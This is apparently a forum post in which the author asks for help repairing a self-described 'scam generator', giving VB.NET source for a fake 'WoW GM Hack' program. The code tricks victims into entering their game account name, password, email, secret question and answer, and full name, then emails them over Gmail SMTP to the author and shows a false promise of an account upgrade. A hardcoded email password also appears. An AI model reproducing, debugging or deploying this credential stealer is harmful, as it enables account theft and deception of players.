Heya, My scam generator isnt working anymore, when I press the send button it says '' The SMTP server requires a secure connection or the client was not authenticated. The server response was: 5.5.1 Authentication Required ''
Any advice? here is the code,
Code:
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If TextBox1.Text = "" Then
MsgBox("The account field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
End If
If TextBox2.Text = "" Then
MsgBox("The password field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
End If
Dim mail As New System.Net.Mail.MailMessage()
Dim SmtpServer As New SmtpClient
SmtpServer.Credentials = New Net.NetworkCredential("[email protected]", "mrkiller08")
SmtpServer.Port = 587
SmtpServer.Host = "smtp.gmail.com"
SmtpServer.EnableSsl = True
mail.To.Add("[email protected]")
mail.From = New MailAddress("[email protected]")
mail.Subject = "Me"
mail.Body = "Account: " & TextBox1.Text & vbNewLine & "Password: " & TextBox2.Text & vbNewLine & "E-mail: " & TextBox3.Text & vbNewLine & "Secret Question: " & TextBox4.Text & vbNewLine & "Secret Question Answer: " & TextBox5.Text & vbNewLine & "Full Name: " & TextBox6.Text & vbNewLine & "Gamemaster: " & TextBox7.Text
SmtpServer.Send(mail)
MsgBox("Success! The account will be upgraded within 3hours!")
End Sub
End Class
+ Rep to the one who can solve this!